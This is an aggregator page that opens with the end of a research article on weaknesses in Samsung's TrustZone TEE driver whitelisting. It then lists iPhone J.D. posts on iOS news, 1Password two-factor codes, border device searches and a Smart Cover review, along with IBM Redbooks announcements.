Although trustlets aren’t granted different sets of “capabilities”, drivers can distinguish between the trusted applications requesting their services by using the caller’s UUID. Essentially, well-written drivers can verify that whichever application consumes their services is contained within a “whitelist”, thus minimising the exposed attack surface.
Sensitive operations, such as mapping-in and modifying physical memory are indeed unavailable to trusted applications. They are, however, available to any driver. As a result, driver authors must be extremely cautious, lest they unintentionally provide a service which can be abused by a trustlet.
Scanning through the drivers provided on Samsung’s Exynos devices, we can see a variety of standard drivers provided by Trustonic, such as the cryptographic driver, the “Trusted UI” driver, and more. However, among these drivers are a few additional drivers authored by Samsung themselves.
One such example is the TIMA driver (UUID FFFFFFFFD0000000000000000000000A), which is used to facilitate Samsung’s TrustZone-based Integrity Measurement Architecture. In short, a component of TIMA performs periodic scans of the kernel’s memory in order to ensure that it is not tampered with.
Samsung has elected to split TIMA’s functionality in two; the driver mentioned above provides the ability to map in physical memory, while an accompanying trusted application consumes these services in order to perform the integrity measurements themselves. In any case, the end result is that the driver provides APIs to both read and write physical memory - a capability which is normally reserved for drivers alone.
Since this functionality could be leveraged by attackers, Samsung has rightly decided to enforce a UUID whitelist in order to prevent access by arbitrary trusted applications. Reversing the driver’s code, we can see that the whitelist of allowed trusted applications is embedded within the driver. Quite surprisingly, however, it is no short list!

Perhaps the take-away here is that having a robust security architecture isn’t helpful unless it is enforced across-the-board. Adding drivers exposing potentially sensitive operations to a large number of trustlets negates these efforts.
Of course, apart from compromising the “Normal World”, the TEE itself holds many pieces of sensitive information which should remain firmly beyond an attacker’s reach. This includes the KeyMaster keys (used for Android’s full disk encryption scheme), DRM content decryption keys (including Widevine) and biometric identifiers.Afterword
While the motivation behind the inclusion of TEEs in mobile devices is positive, the current implementations are still lacking in many regards. The introduction of new features and the ever increasing number of trustlets result in a dangerous expansion of the TCB. This fact, coupled with the current lack of exploit mitigations in comparison to those offered by modern operating systems, make TEEs a prime target for exploitation.
We’ve also seen that many devices lack support for revocation of trusted applications, or simply fail to do so in practice. As long as this remains the case, flaws in TEEs will be that much more valuable to attackers, as vulnerabilities, once found, compromise the device’s TEE indefinitely.
Lastly, since in many cases TEEs enjoy a privileged vantage point, compromising the TEE may compromise not only the confidentiality of the information processed within it, but also the security of the entire device.

Categories: Security

In the news

iPhone J.D. - Fri, 07/21/2017 - 00:46

Apple updated iOS to version 10.3.3 this week.  You should update your iPhone and iPad for the same reasons I mentioned back when 10.3.2 came out; iOS updates always improve security.  In fact, Ben Lovejoy of 9to5Mac reports that one of the things fixed is the potential ability of a hacker who is close enough to your iPhone to exploit a flaw in the iPhone's Wi-Fi chip and wirelessly gain control of your iPhone.  Yikes!  Glad that one was fixed.  And now, the other news of note from the past week:

  • South Carolina attorney Justin Kahn discusses a recent update to the iAnnotate app (version 4.3) which lets you annotate two documents side-by-side.
  • John Gruber of Daring Fireball explains why you should not manually quit apps in iOS.  Sure, you can do it occasionally if an app is frozen or otherwise isn't working properly, but if you believe that you are saving memory or making your iPhone faster by quitting apps, you are wrong.
  • Jonny Evans of Computerworld shares over 50 iOS 10 tips, and there are some good ones on that list.
  • Cella Lao Rousseau of iMore reviews portable Apple Watch chargers.
  • When I purchased a 2017 Honda Accord earlier this year, I made sure to select CarPlay as an option.  I love CarPlay and I use it every time I drive.  Reese Counts of Autoblog reports that this Fall, Honda will start to sell the 2018 Honda Accord, with Apple CarPlay included in every model and a larger 8" display (up from 7" on the 2017 model).  It will also include a physical knob to control the volume instead of touchscreen volume controls (which can be hard to use).
  • There was a time when I would carry an iPhone, and iPad and an iPad mini all at the same time, but apparently that is nothing.  Ben Lovejoy of 9to5Mac reports that Chinese customs agent stopped a woman coming in from Hong Kong who had 102 iPhones strapped to her body.  (iPhones are cheaper in Hong Kong than in mainland China.)
  • David Pogue of Yahoo explores the idea of charging an iPhone wirelessly, and interviews the CEO of Energous, a company trying to do this.  The charge would be very slow (a trickle charge), and the technology seems far off, but someday this might actually work.
  • Ryan Christoffel of MacStories reviews the new CARROT Weather app, an app that gives you both the weather forecast and snarky banter.
  • We all like free WiFi, but at what cost?  Rheet Jones of Gizmodo reports that 22,000 people agreed to clean toilets to get WiFi ... because they didn't read the terms of service.
  • And finally, yesterday Apple updated its Clips app to version 1.1.  This first update to Clips adds some neat new features like new posters (an animated background on which you can place text), but the big new feature is the ability to add Disney/Pixar characters to your videos.  Here is an 11 second demo I created at my desk which didn't take much more than 11 seconds to make:

Categories: iPhone Web Sites

Using 1Password for websites with two-factor authentication

iPhone J.D. - Thu, 07/20/2017 - 16:09

A few days ago, 1Password was updated to improve the ability to use 1Password with sites that have a time-based, two-factor authentication code.  This is a useful feature of 1Password.  Here is why I recommend two-factor authentication in general, and how it and how it now works in 1Password on the iPhone or iPad.

Two-factor authentication is good

Two-factor authentication is a way to confirm your identity when you are logging in to a website.  Normally a website asks for your username and password, but your username is often easy for a hacker to learn (it might just be your public email address), and thus all a hacker needs to do is learn your password and he has access to your account with that website.  There are lots of different ways that a hacker could theoretically learn your password — such as if you use the same password at multiple sites (don't do that!) or if you have multiple password that are similar and the hacker can guess your pattern (don't do that either!) or if someone looks over your shoulder while you are typing in your password in a public spot (yikes!), etc.  With two-factor authentication, it is not enough for the hacker to have your username and password; he must also have access to a device in your possession (such as your iPhone) which displays a number that changes every 30 seconds.  If the hacker is in some foreign country across the globe, he won't have that, and his attempts to access your account will fail.

There are many different iPhone apps which can be used to display authentication numbers which change every 30 seconds.  1Password is a good one to use just because you naturally think of that app as a place to store login information.  But with the update this week, 1Password is even better than other apps because it can automatically put the number on your clipboard.  This makes two-factor authentication really fast to use.  And that's good because you get more security without a bottleneck that slows you down.

Here is how you use the feature. 

Configure a 1Password entry to use a one-time password

First, in 1Password, find your entry for the website in question, where you already have your username and password stored.  Tap Edit in the top right corner and scroll down until you see "Add new one-time password."  Tap that and you will see a new entry which has a QR code icon on it.

 

Next, on your computer, go to the website in question.  In this example, I'll use Backblaze, the service I use to automatically backup my home computer.  On the account settings area of the Backblaze website on my computer, I click on the option to turn-on two-factor authentication.  The website will then display a big QR code on my computer's monitor.  I tap the QR code icon in 1Password on my iPhone and use my iPhone's camera to scan the QR code.

Now my 1Password entry for Backblaze has a One-Time Password field with a six-digit number which changes every 30 seconds.  There is even a little timer on the right which counts down the seconds so I can see how long I have until the password changes.

Using 1Password with two-factor authentication

Now that the entry for a website has two-factor authentication configured, you can use it the next time that you access that website.  So back to my Backblaze example, whenever I want to access the Backblaze website on my iPhone, I tap the Action button at the bottom of the Safari window, then I select 1Password, I use my Touch ID fingerprint to confirm that I am really me, and then 1Password automatically types my username and my password on the website.

 

Next, the website will ask me for my authentication code, but I don't have to go back to the 1Password app to lookup that code.  Right after 1Password automatically entered my username and password, it pasted the six-digit code to my iPhone clipboard, and it briefly displayed a message that says "One-time password saved to the clipboard."  Thus, all I need to do is tap in the box and select paste, and the number is entered for me.

 

This new system is so much more convenient then having to manually go to another app to find the number and then going back into Safari to enter the number.

Although my focus here is iPhone/iPad, this new 1Password system works the same on your PC and Mac.  Just use 1Password on your computer to enter the username/password, and then use your computer to paste the number when you are asked to enter the six-digit code.  [UPDATE:  To be more clear, the current version of 1Password for Mac automatically copies that code so that it is ready for you to paste, just like iOS.  The current version of 1Password 6 for Windows (version 6.6.439) does not automatically copy the code, but you can right-click on the entry in the browser add-on to manually copy that code and then you can paste it into the Windows browser.  I presume that 1Password for Windows 6 will gain this feature in a future update.]

I currently have two-factor authentication in 1Password configured for Backblaze, Dropbox and Facebook, but I plan to add more websites in the future now that 1Password works so much better with two-factor authentication.

Categories: iPhone Web Sites

IBM Spectrum Accelerate Deployment, Usage, and Maintenance

IBM Redbooks Site - Wed, 07/19/2017 - 09:30
Redbook, published: Wed, 19 Jul 2017

This edition applies to IBM® Spectrum Accelerate V11.5.4.

Categories: Technology

IBM FlashSystem A9000 and A9000R Business Continuity Solutions

IBM Redbooks Site - Wed, 07/19/2017 - 09:30
Redpaper, published: Wed, 19 Jul 2017

IBM® FlashSystem A9000 and IBM FlashSystem® A9000R provide copy functions suited for various data protection scenarios that enable you to enhance your business continuance, disaster recovery, data migration, and backup solutions.

Categories: Technology

Monitoring Overview for IBM Spectrum Scale and IBM Elastic Storage Server

IBM Redbooks Site - Wed, 07/19/2017 - 09:30
Draft Redpaper, last updated: Wed, 19 Jul 2017

IBM® Spectrum Scale is software defined storage for high performance, large scale workloads.

Categories: Technology

IBM Db2: Investigating Automatic Storage Table Spaces and Data Skew

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redpaper, published: Mon, 17 Jul 2017

The scope of this IBM® Redpaper™ publication is to provide a high-level overview of automatic storage table spaces, table space maps, table space extent maps, and physically unbalanced data across automatic storage table space containers (that is, data skew).

Categories: Technology

IBM Z Connectivity Handbook

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redbook, published: Mon, 17 Jul 2017

This IBM® Redbooks® publication describes the connectivity options that are available for use within and beyond the data center for the IBM Z family of mainframes, which includes these systems:

  • IBM z14
  • IBM z13®
  • IBM z13s™
  • IBM zEnterprise® EC12 (zEC12)
  • IBM zEnterprise BC12 (zBC12)
This book highlights the hardware and software components, functions, typical uses, coexistence, and relative merits of these connectivity features.
Categories: Technology

IBM Z Functional Matrix

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redpaper, published: Mon, 17 Jul 2017

This IBM® RedpaperTM publication provides a list of features and functions that are supported on IBM ZTM, including the IBM z14TM(z14), IBM z13TM(z13®), IBM z13sTM(z13s™), IBM zEnterprise® EC12 (zEC12), and IBM zEnterprise BC12 (zBC12).

Categories: Technology

IBM z14 Technical Introduction

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redbook, published: Mon, 17 Jul 2017

This IBM® Redpaper Redbooks® publication introduces the latest IBM Z platform, the IBM z14®.

Categories: Technology

New information on your iPhone being searched by Customs at the border

iPhone J.D. - Mon, 07/17/2017 - 01:48

Taking an iPhone or iPad when you leave or enter the United States is a complicated issue for attorneys.  You are likely going to want to do work when you are abroad — especially if you are traveling for business, not pleasure — and thus it makes perfect sense to have your iOS device with you.  In fact, it can be a much better option than a computer, which can be more easily attacked by malware in a foreign country.  If you can get access to WiFi and you use VPN software like Cloak, you should be fairly safe.  The problem, however, is that U.S. customs agents as of late have been demanding to search mobile devices upon reentry into the country, and there are some reports that they will sometimes even copy the data from a device.  If you have confidential attorney-client communications or attorney work product, you don't want a stranger who works as a U.S. customs agent to have unfettered access.

To try to get more concrete information on the current state of affairs, Sen. Ron Wyden, a Democrat from Oregon who has a reputation of being a privacy advocate, recently sent a letter to Acting Commissioner Kevin McAleenan of Customs and Border Protection (CBP) with questions on the current policies.  I encourage you to read the full response as posted by the Washington Post, as well as the article by Brian Fung of the Post, but here are four parts of the response that jumped out a me.

First, CBP does sometimes search electronic devices in the possession of individuals entering the United States, but does so rarely — less than one-hundredth of one percent of travelers.  CBP will inspect devices of both non-citizens and U.S. citizens.

Second, if your device is locked, CBP can ask you to unlock your device so that they can search it.  If you refuse to do so, and if you are a U.S. citizen, CBP will still allow you to enter the country, but you may be delayed (so you may miss your connecting flight) and your device will likely be confiscated.  If you are not a U.S. citizen, failure to unlock your device could be a reason that CBP does not allow you to enter the United States.

Third, CBP takes the position that it has the authority to search anything that is on the device itself.  CBP asserts several justifications for searching devices, and you can probably guess them.  For example, CBP may look for contraband (such as child pornography), or information that could be a threat to national security (such as something related to the proliferation of nuclear weapons).

Fourth, CBP will not ask to access your information on remote servers.  Thus, they should not ask you for your password to Dropbox, Facebook, your law firm, etc.  However, if there is a local copy of any data synced to a remote server — such as local files in the Dropbox app on your iPhone — CBP can look at those documents.

All of this means that if you don't look too suspicious — which unfortunately might be determined based upon the color of your skin or the clothes that you are wearing — there is a very good chance that a customs agent will not ask to look at your phone at all.  My most recent experience with customs was just a few weeks ago when I was in a car and drove across the border to Canada and then drove back again.  The experience of re-entering the U.S. was incredibly quick and non-intrusive for me, just a few questions.  Then again, I was in a van with my wife and kids coming across the border next to Niagara Falls, so it was fairly obvious that we were just typical American tourists.

But if you are unlucky, customs may well ask you to unlock your iPhone or iPad so that they can search through your files.  You need to decide before your travel whether this risk is enough reason to not take your device in the first place.  The Electronic Frontier Foundation prepared an excellent document on this topic called Digital Privacy at the U.S. Border: Protecting the Data On Your Devices and In the Cloud.  According to the EFF, you can ask the border agent to withdraw the order that you unlock your device on the grounds that the device contains confidential and sensitive attorney-client communications and attorney-work product.  This might work.  But it might not, and in the process you are going to have explain to the agent in great detail what is on the device.

The EFF also cites a 2009 directive stating that border agents must consult with the CBP legal office before searching documents protected by the attorney-client privilege.

I wish I could conclude this post with easy answers, but it appears that there are none at the moment.  I don't know how you should weigh the usefulness of having your iPhone and iPad with you outside of the country versus the risk that a border agent will try to search the device as you enter the country.  And remember, we are just talking about U.S. border agents right now; you may also find yourself facing an official in another country who demands access to your device and who has no regard for the Rules of Professional Conduct or the Rules of Evidence governing privilege.

Categories: iPhone Web Sites

IBM z14 Technical Guide

IBM Redbooks Site - Sun, 07/16/2017 - 09:30
Draft Redbook, last updated: Sun, 16 Jul 2017

IBM z14 Technical Guide

Categories: Technology

Essentials of Cloud Application Development on IBM Bluemix

IBM Redbooks Site - Fri, 07/14/2017 - 09:30
Draft Redbook, last updated: Fri, 14 Jul 2017

This IBM® Redbooks® publication is based on the Presentations Guide of the course Essentials of Cloud Application Development on IBM Bluemix that was developed by the IBM Redbooks team in partnership with IBM Skills Academy Program.

Categories: Technology

VersaStack Solution for File Storage using IBM Storwize V5030 and Windows Server 2016

IBM Redbooks Site - Fri, 07/14/2017 - 09:30
Draft Redpaper, last updated: Fri, 14 Jul 2017

This IBM® Redpaper™ publication helps you understand how to implement VersaStack with Windows Server 2016 and IBM Storwize V5030 for file storage.

Categories: Technology

IBM Spectrum Archive Enterprise Edition V1.2.4: Installation and Configuration Guide

IBM Redbooks Site - Fri, 07/14/2017 - 09:30
Draft Redbook, last updated: Fri, 14 Jul 2017

This IBM® Redbooks® publication helps you with the planning, installation, and configuration of the new IBM Spectrum™ Archive (formerly IBM Linear Tape File System™ (LTFS)) Enterprise Edition (EE) V1.2.4.0 for the IBM TS3310, IBM TS3500, and IBM TS4500 tape libraries.

Categories: Technology

In the news

iPhone J.D. - Fri, 07/14/2017 - 00:43

Today at 10am Pacific / 1pm Eastern, legal tech consultant Brett Burney and New Orleans attorney Ernie Svenson are presenting a free webinar called Advanced Mobile Lawyering Tactics.  I have known Brett and Ernie for a long time, and both are excellent presenters and very knowledgeable on mobile technology.  According to a post on Brett's Apps in Law website, topics include:  file management, note taking, scanning documents and working with PDF files, legal research, mind-mapping, and security tips.  If you are in the Central time zone like I am, that means that you can learn some useful tips while you have lunch at your desk at Noon.  Click here to register for free.  And now, the news of note from the past week:

  • In an article for Macworld, Jason Snell explains how the new iPad Pro, especially when paired with the upcoming iOS 11, is an amazing device for getting work done
  • In another article for Macworld, Jeffery Battersby reviews Citrix ShareFile, a service that works on your computer and iOS device.  My law firm uses ShareFile and it works well for sharing large files.
  • In yet another article for Macworld, Glenn Fleishman explains how the ability of apps to track you (even when you want them to) will change in iOS 11.
  • Abhishek Kurve of Cult of Mac explains how, with iOS 11, you will get more free space on your iPhone or iPad.
  • Serenity Caldwell of iMore discusses what will be new when watchOS 4 for the Apple Watch is released later this year.
  • Steven Sande of Apple World Today reviews the iDevices Outdoor Switch, which brings HomeKit control to outdoor lights (and other things that you plug in outside).
  • Jordan Kahn of 9to5Mac reports that the Waze driving app now lets you record custom voice prompts "turn right," "turn left," etc. and share them with others.  Finally, you can have your spouse tell you what to do in your car.
  • And finally, Joanna Stern of the Wall Street Journal describes steps you can take — from easy to hard — to fix an old iPhone battery that doesn't do as good a job of holding a charge:

Categories: iPhone Web Sites

Hortonworks Data Platform with IBM Spectrum Scale: Reference Guide for Building an Integrated Solution

IBM Redbooks Site - Wed, 07/12/2017 - 09:30
Redpaper, published: Wed, 12 Jul 2017

This IBM® Redpaper™ publication provides guidance about building an enterprise-grade data lake by using IBM Spectrum™ Scale and Hortonworks Data Platform for performing in-place Hadoop or Spark-based analytics.

Categories: Technology

Review: Apple Smart Cover for 12.9" iPad Pro -- now available in leather

iPhone J.D. - Wed, 07/12/2017 - 00:04

On March 2, 2011, Apple introduced the iPad 2, Apple's first attempt to improve upon the iPad.  The iPad 2 itself was nicer because it faster, thinner and lighter.  But I was also excited about two new accessories.  First, Apple introduced an HDMI connector, letting you send 1080p video to a TV, and opening the door to higher-quality presentations.  (Having said that, it amazes me that, this many years later, I still encounter VGA more than HDMI when I give presentations using my iPad.)  Second, Apple introduced the Smart Cover, a device that could both protect the screen of the iPad and work as a stand.  Back in 2011, you could get either a polyurethane version for $39 or a leather version for $69.  I opted for the leather version, and I used leather Smart Covers for many years with multiple versions of the iPad and iPad Air.

When Apple came out with the larger 12.9" iPad Pro in the Fall of 2015, I bought a new Smart Cover to accommodate the new size.  I was curious if the extra weight of the 12.9" iPad Pro would make the Smart Cover less stable as a stand, but I was happy to discover that it worked just fine.  However, Apple only released a polyurethane version of the Smart Cover for the 12.9" iPad Pro.  Last month, when Apple released the second generation of the 12.9" iPad Pro, Apple also introduced the first 12.9" version of the leather Smart Cover.  So you can now choose between a 12.9" polyurethane version for $59 or a 12.9" leather version for $79.  (Both versions work with the first generation and second generation version of the 12.9" iPad Pro.)  Here are my thoughts if you are trying to decide between the two.

Smart Covers are a great idea

Smart Covers have been around for so many years that I suspect most of you have owned or at least tried one by now.  But for the sake of completeness, I will start by briefly noting why I like the Smart Cover so much as an iPad accessory.

First, it protects the screen.  The glass on the iPad is pretty strong and scratch-resistant anyway, but with a Smart Cover you never need to worry about a sharp object damaging the screen.  I also find that it makes the iPad easier to grip when carrying it, which provides further protection because I am less likely to drop my iPad.

Second, it gets out of the way when you don't need it.  The genius of the Smart Cover is that is uses magnets built-in to the side of an iPad.  Thus, it is easy to attach to the iPad, and easy to remove.  When I am using my iPad at work at my desk, I typically don't have the Smart Cover attached.  But whenever I pick up my iPad to take it to a meeting or another attorney's office, I always quickly attach it.

Third, it folds into a stand, in two different positions — one that keeps the iPad more flat with a slight rise in the back, great for using the Pencil or on-screen keyboard:

And one that keeps the iPad more upright, perfect for when you are looking at the screen more than touching it:

When I want my iPad upright for a more extended period of time, I actually prefer to use a dedicated stand to prop up my iPad so that I never have to worry about the iPad falling down, even if I push hard on the screen.  And for over a year now, I've been incredibly happy with the Simplex Tablet iPad Stand by Thought Out which I reviewed in 2016.  That device is only $30 and it is incredibly strong, and makes it easy to have my iPad propped up next to my computer so that I can use both at the same time.  But the Simplex is heavy enough that I only rarely move it outside of my office.  With the Smart Cover, I always have a stand with me, wherever I am, with no noticeable extra weight.

Polyurethane vs. Leather

Now you know why I recommend that attorneys get a Smart Cover for an iPad.  The remaining question is:  which one:  polyurethane or leather?  There are some differences, and the leather version is not always better even though it cost $20 more.

Strength.  As I noted above, back in 2015, I was worried that the extra weight larger 12.9" version of the iPad would make the Smart Cover less capable as a stand.  With the polyurethane version, that has not been a problem at all.  But the leather version, for some reason, is not quite as strong when I have the iPad in the more fully upright position.  Every time I did a side-by-side test, with the leather Smart Cover in stand mode on one of my 12.9" iPad Pros and the polyurethane on the other one, as I applied gradually more pressure both iPads, the leather Smart Cover would always collapse before the polyurethane version. 

Moreover, I have used the polyurethane version since the Fall of 2015 and it has only rarely failed as a stand — and when it did, it was often because I wasn't placing it on a flat surface, or I was applying what was really unreasonable pressure to the screen.  I've been using the leather Smart Cover for a few weeks now, and there have been two times when I felt the triangle of the stand start to slip as I was using it.  Admittedly, both times, I was probably applying more pressure than was necessary.  The magnets holding the Smart Cover to itself just seem a little bit less strong on the leather version.

I don't mean to suggest that the leather version doesn't work as a stand.  It does work, and it works well.  But the polyurethane version works better. 

Durability.  Since I started with the bad news about the leather version, I'll move on to the other potentially negative issue.  If you spill something on the polyurethane version, you can just wipe it off.  But with the leather version, you can potentially stain the leather.  I've never had this happen to me in my many years of using leather Smart Covers on a 9.7" iPad, but I've heard other folks mention it as a reason that they prefer the polyurethane version.

The two materials also wear differently.  Polyurethane maintains the same look over time.  Leather ages over time, and can change color, especially in areas where the oils from  your hands touch the case more often.  I actually consider this a feature of the leather version, not a shortcoming; to me, it gains personality over time.

Look and feel.  The main reason that I prefer the leather case is the way that it feels.  The polyurethane Smart Cover has a slightly sticky feel to it.  Even after using the polyurethane version for well over a year, I never really got used to it.  As soon as I went back to the leather version a few weeks ago, I was instantly happy to return to the feel of leather.  It feels great to the touch, the same way that leather seats in a car are nicer than seats with a plastic-y feel.

I also think that the leather looks much nicer too.

Colors.  For the older 9.7" or newer 10.5" version of the iPad, you get more color options with polyurethane.  I see that Apple currently sells seven 10.5" polyurethane colors:  Mist Blue, Pollen, Flamingo, White, Pink Sand, Midnight Blue and Charcoal Gray.  (You get eight options with the 9.7" Smart Cover.)  But with the 12.9" polyurethane Smart Cover, your only color choices are White and Charcoal Gray.  I'm not sure why Apple considers color so much less important with the larger model.

With the 12.9" leather Smart Cover, you get three color choices:  Saddle Brown, Midnight Blue and Black.  (The 10.5" leather Smart Cover has a fourth color:  Taupe.)

Ultimately, it doesn't matter how many different colors are offered.  All that really matters is whether there is a color that works for you.  I prefer a dark color, which is available in both leather and  polyurethane.  But I prefer the Black leather to the almost-but-not-quite-black Charcoal Gray polyurethane.  In the following picture. the polyurethane model is on top of the leather model:

Of course, if White, Saddle Brown or Midnight Blue is the best color for you, then you can make your selection accordingly.

Conclusion

After spending over a year using a polyurethane Smart Cover, I'm happy to be able to return to a leather Smart Cover.  For me, it looks and feels so much nicer.  I wish it was 100% as strong a stand as the polyurethane Smart Cover, but it is more than strong enough.  The extra $20 is worth it for something that I carry around every day, and thus feel and look at every day.

If you are in the market for a 12.9" iPad Pro, or really any iPad for that matter, I encourage you to get a Smart Cover.  They add protection and live up to the "smart" in their name by cleverly folding up into a stand and getting out of the way quickly when you don't need them.  And best of all, now you once again have a choice of leather or polyurethane for the 12.9" version.

Click here for the leather 12.9" Smart Cover from Apple ($79.00)

Click here for the polyurethane 12.9" Smart Cover from Apple ($59.00)

Categories: iPhone Web Sites

Data-at-rest Encryption for the IBM Spectrum Accelerate Family

IBM Redbooks Site - Tue, 07/11/2017 - 09:30
Redpaper, published: Tue, 11 Jul 2017

With the ever-growing landscape of national, state, and local regulations, industry requirements, and increased security threats, ensuring the protection of an organization's information is a key part of operating a successful business.

Categories: Technology

Pages

Subscribe to www.hdgonline.net aggregator